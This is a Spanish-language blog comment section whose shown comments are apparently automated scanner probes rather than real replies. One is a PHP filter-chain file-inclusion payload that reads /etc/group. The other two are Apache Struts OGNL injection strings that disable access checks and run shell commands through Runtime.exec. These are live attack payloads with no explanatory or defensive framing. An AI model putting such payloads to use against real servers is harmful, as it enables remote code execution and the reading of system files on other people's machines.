68 respuestas

  1. php://filter/convert.base64-encode||string.rot13|dechunk|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|convert.iconv.UTF8.UCS-4|/resource=/etc/group

  2. ‘ + (#_memberAccess[«allowStaticMethodAccess»]=true,#foo=new java.lang.Boolean(«false») ,#context[«xwork.MethodAccessor.denyMethodExecution»]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(«cmd.exe /c set /a 147 – 58695565»).getInputStream())) + ‘

  3. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘expr 427 – 43741683’).getInputStream())).(#q)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *